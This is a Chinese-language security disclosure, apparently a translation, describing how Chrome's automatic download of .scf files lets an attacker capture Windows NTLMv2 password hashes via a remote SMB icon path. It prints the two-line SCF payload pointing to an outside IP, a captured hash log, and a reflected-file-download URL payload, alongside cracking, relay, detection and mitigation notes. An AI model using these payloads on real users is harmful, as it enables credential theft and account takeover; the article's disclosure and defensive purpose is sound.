如何使用谷歌Chrome瀏覽器竊取Windows密碼

寫在前面的話

利用Windows操作系統的SMB文件共享協議來竊取身份憑證的攻擊技術長久以來都一直存在，這是一個難以避免的問題。雖然這種技術有多種實現方式，但大多都局限於本地網路內。在過去的十多年裡，還沒有人公開演示過針對瀏覽器（除了IE和Edge之外）的SMB認證攻擊，但是在這篇文章中我們將介紹一種Windows憑證竊取攻擊，這種技術會影響目前最流行的Web瀏覽器-ChromeChrome（默認配置下），以及支持該瀏覽器的所有Windows版本。

問題描述

在默認配置下，Chrome瀏覽器會自動下載它認為安全的文件，而且不會提示用戶選擇文件的存儲位置（使用的是預設地址）。從安全的角度來看，這個功能是存在問題的，但如果惡意文件想要運行的話，還是需要用戶手動點擊「打開／運行」按鈕才可以。不過，如果下載下來的文件不需要用戶交互就能夠執行惡意操作的話，那又該怎麼辦呢？真的有哪一類文件可以做到這一點嗎？

Windows資源管理器Shell命令文件（.scf文件）是一種鮮為人知的文件類型，可以追溯到Windows98。可能只有Windows98/Me／NT／2000/XP用戶可能遇到過這種文件，當時它主要用來顯示桌面快捷方式。它本質上是一種文本文件，其中有一部分可以確定一段需要運行的命令（僅限於運行資源管理器和切換桌面）和一個圖標文件的位置。下面是一個SCF文件的內容示例：

[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop

隨著Windows快捷方式LNK文件的誕生，當文件顯示在資源管理器中時，圖標地址會進行自動解析。將圖標地址指向一台遠程SMB伺服器已經是眾所周知的攻擊向量了，這種技術利用了Windows在訪問遠程文件服務時的自動化身份驗證功能。但是從攻擊的角度來看，LNK和SCF之間的區別在哪裡呢？自從震網病毒出現之後，Chrome會強制將LNK文件的後綴名改為.download，但SCF文件並沒有得到相同的待遇。

因此，我們可以利用一個僅含兩行代碼的SCF文件來欺騙Windows系統：

[Shell] IconFile=\170.170.170.170icon

文件下載完成之後，當用戶在Windows資源管理器中打開下載目錄的那一瞬間，請求就會被觸發，隨後文件便會被刪除。整個過程根本不需要用戶點擊或打開下載文件，因為Windows資源管理器會自動嘗試獲取「icon」（圖標）內容。

攻擊者所設置的遠程SMB伺服器隨時準備著捕獲目標用戶的用戶名以及NTLMv2密碼哈希，他們可以將這些數據用於離線破解或偽造用戶身份並訪問在線服務（SMB中繼攻擊）。捕獲到的信息大致如下：

[*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 -173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000000000000

上面這個例子泄漏了目標用戶的用戶名、所在域（Domain）、以及NTLMv2密碼哈希。

需要注意的是，無論你的系統設置如何，SCF文件在Windows資源管理器中都不會顯示其後綴名（.scf）。因此，類似picture.jpg.scf這樣的文件名在Windows資源管理器中顯示的就是picture.jpg。因此，這也使得利用SCF文件的攻擊活動更加難以被發現了。

影響密碼泄漏

對於企業和政府用戶來說，密碼泄漏將有可能導致內網提權和數據泄漏等風險出現。對於使用了微軟賬號（MSA）而非本地賬號的Windows8／10的用戶來說，密碼泄漏將會影響用戶所有的微軟服務，例如OneDrive、Outlook.com、Office365、Office Online、Skype、以及Xbox Live等等。與此同時，密碼重用等問題還會導致更多的賬號發生泄漏。

從密碼破解的可行性方面來說，近些年來，基於GPU的密碼破解技術得到了巨大的發展。現在，一張Nvidia GTX 1080的計算能力約為1600MH/s，即每秒可計算16億哈希值。對於一個長度為8個字元的密碼，一台配備了四塊GTX1080的密碼破解機可以在不到一天時間裡遍歷整個密碼空間（包括大小寫字母+常用特殊字元(!@#$%&)）。

SMB中繼攻擊

像Microsoft Exchange（或Outlook）這種允許遠程訪問的以及使用NTLM作為身份驗證方法的服務將有可能受到SMB中繼攻擊，攻擊者將能夠偽裝成受害者來訪問用戶的數據，而且還不用破解用戶的密碼。Jonathan Brossard在BlackHat黑客大會上已經向全世界演示過這種方法了，感興趣的同學可以觀看這個演示視頻【傳送門】。

在某些特殊情況下，攻擊者甚至還可以在中繼攻擊的幫助下，利用竊取來的證書入侵目標網路，並獲取內部網路的訪問權。

針對SCF的反病毒產品

當瀏覽器無法提示這方面的安全風險時，我們只能指望其他的安全解決方案能夠保護我們的安全了。於是我們對當前領先的安全解決方案進行了測試，以確定它們是否能夠識別這類惡意下載文件。但不幸的是，所有測試產品都無法將這類文件標記為可疑對象。不過，想要識別出可疑的SCF文件其實也並不難，我們只要檢查文件中的IconFile參數所指向的地址就可以了，所以我們希望廠商在將來能夠增加這種檢測機制。

反射文件下載（RFD）攻擊

註：這種攻擊技術最早是由OrenHafif發現的，感興趣的同學可以參考這篇文章【參考資料】。

由於SCF格式比較簡單，而我們的攻擊只需要兩行代碼，而且可定製程度較高，因此它也非常適用於RFD攻擊。

我們以WorldBankAPI為例進行演示：

%0A[Shell]%0AIconFile=\170.170.170.170 est%0Alol=%0B&format=jsonp

由於字元「%0B」無法列印出來，因此Chrome將會自動將響應內容下載並保存為iwantyourhash.scf文件。當保存這個文件的下載目錄被打開之後，Windows將會嘗試與遠程SMB伺服器進行身份驗證，並暴露目標用戶的認證哈希。

緩解方案

為了防止這種通過SCF文件所進行的NTLMv2憑證竊取攻擊，我們可以通過下列方法禁用Chrome瀏覽器的自動下載功能：設置->顯示高級設置->勾選「在下載之前詢問保存文件路徑」選項。

除此之外，我們也希望谷歌能夠在將來的Chrome瀏覽器版本中解決這個問題。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！